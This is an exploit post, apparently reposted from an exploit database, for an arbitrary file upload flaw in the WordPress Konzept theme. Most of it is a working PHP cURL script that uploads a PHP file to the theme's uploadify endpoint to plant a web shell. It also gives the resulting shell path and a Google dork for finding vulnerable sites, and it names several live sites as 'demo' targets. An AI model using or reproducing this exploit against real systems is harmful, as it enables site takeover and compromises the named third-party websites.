Kod:
Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability
Exploit Author : NULL_Pointer
Contact : https://www.facebook.com/xenith.gianni
Date : 19/09/2014
Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept
Version: 1.0
Google Dork : inurl:/wp-content/themes/konzept/
Tested on : Linux, Windows 7
--------------------------------------------------------------
WordPress Theme Konzept suffers from Arbitrary File Upload Vulnerability.
Exploit :
<?php
$url = "http://127.0.0.1"; // put URL Here
$post = array
(
"file" => "@null_pointer.jpg",
"name" => "null_pointer.php"
);
$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php
Prof Video : http://www.youtube.com/watch?v=g7RaR3bCMag
Demo Sites :
http://www.ladepro.fr
http://getawayproductions.fr
http://www.victor-remere.fr
http://www.biceps-graphicdesign.fr
# C147CCAFF3C95942 1337day.com [2014-09-19] 3326DEF0807D8448 #
Mənbə: http://www.1337day.com/exploit/22667